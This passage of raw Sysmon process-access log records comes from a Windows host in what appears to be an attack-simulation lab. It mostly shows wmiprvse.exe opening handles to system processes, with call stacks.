Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.936{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-D0AA-00000000AD01}7532C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6DD2-603E-D5AA-00000000AD01}1566410672C:\Windows\system32\conhost.exe{05ADC7E1-6DD2-603E-D4AA-00000000AD01}15248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242526Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 